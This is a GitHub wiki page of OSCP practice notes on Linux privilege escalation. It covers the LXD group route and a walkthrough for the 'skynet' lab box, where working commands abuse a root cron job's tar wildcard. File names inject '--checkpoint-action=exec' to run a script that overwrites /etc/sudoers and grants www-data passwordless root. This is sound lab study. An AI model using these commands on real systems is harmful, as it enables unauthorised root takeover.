Priv Esc Experience - rabakuku/OSCP-PWK GitHub Wiki

Get Root if user is part of LXD Linux Group

https://www.geeksforgeeks.org/tabby-hack-the-box-walkthrough-for-root-flag/?ref=rp

git clone https://github.com/saghul/lxd-alpine-builder.git

CRON backups job using TAR

The linpeas output and manual poking around releaved a backups job that gets run and saved to /home/milesdyson/backsups. The script is owned and ran as root using tar for the backups.

Reading this awsome article by int0x33 shows excatly how to abuse the wildcard in "tar * " into using file names as command arguments to be able to either run a reverse shell script or add the current user into the sudoers file.

I decided to go the sudoers route. I ran "shell" to drop into a normal shell and ran the following to have a proper tty terminals session.

python -c 'import pty;pty.spawn("/bin/bash")'; I moved to /var/www/html (which is the directory being tar'd) and ran the following.

echo 'echo "www-data ALL=(root) NOPASSWD: ALL" > /etc/sudoers' > privesc.sh echo "/var/www/html" > "--checkpoint-action=exec=sh privesc.sh" echo "/var/www/html" > --checkpoint=1 After short while I ran "sudo -l" with the following results.

User www-data may run the following commands on skynet: (root) NOPASSWD: ALL